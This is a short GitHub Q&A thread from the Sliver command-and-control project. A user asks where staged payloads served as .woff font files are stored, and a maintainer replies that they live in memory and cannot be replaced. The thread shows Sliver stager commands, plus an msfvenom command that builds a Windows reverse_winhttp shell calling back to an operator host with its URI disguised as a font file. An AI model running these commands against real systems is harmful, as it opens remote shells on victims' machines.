### DISCUSSION TITLE
Where store  *.woff files?

### DISCUSSION THREAD

**Discussion by Jiw0cha** [BishopFox/sliver#1364] [Q&A] [answered]
Hello.

After run cmd:
```
stage-listener --url http://$ip:$port --profile cool_profile --prepend-size
generate stager -r http --lhost $ip --lport $port
```
I see in log:
```
msfvenom [--platform windows --arch x64 --format raw --payload windows/x64/custom/reverse_winhttp LHOST=$ip LPORT=$port EXITFUNC=thread LURI=static/Inter-Regular.woff] 
/usr/bin/msfvenom --platform windows --arch x64 --format raw --payload windows/x64/custom/reverse_winhttp LHOST=$ip LPORT=$port EXITFUNC=thread LURI=static/Inter-Regular.woff  
```
and then i get this file:
```
wget http://$ip:$port /any/path/any_name_only_ext.woff
```
And file (any_name_only_ext.woff) size is 4 bytes larger than the file in ~/.sliver/builds/ 
Questions:
1. where is this file stored on disk?
2. can I replace this file with my own file?

Why can't you pre-create listener, so I can pick up any payload.

**Comment by rkervella** [comment, marked as answer]
1. The file is not stored on disk
2. You can't. The whole purpose of `stage-listener` is to serve Sliver payloads in the different formats available. If you want to serve something else, you can use the `websites` feature instead.
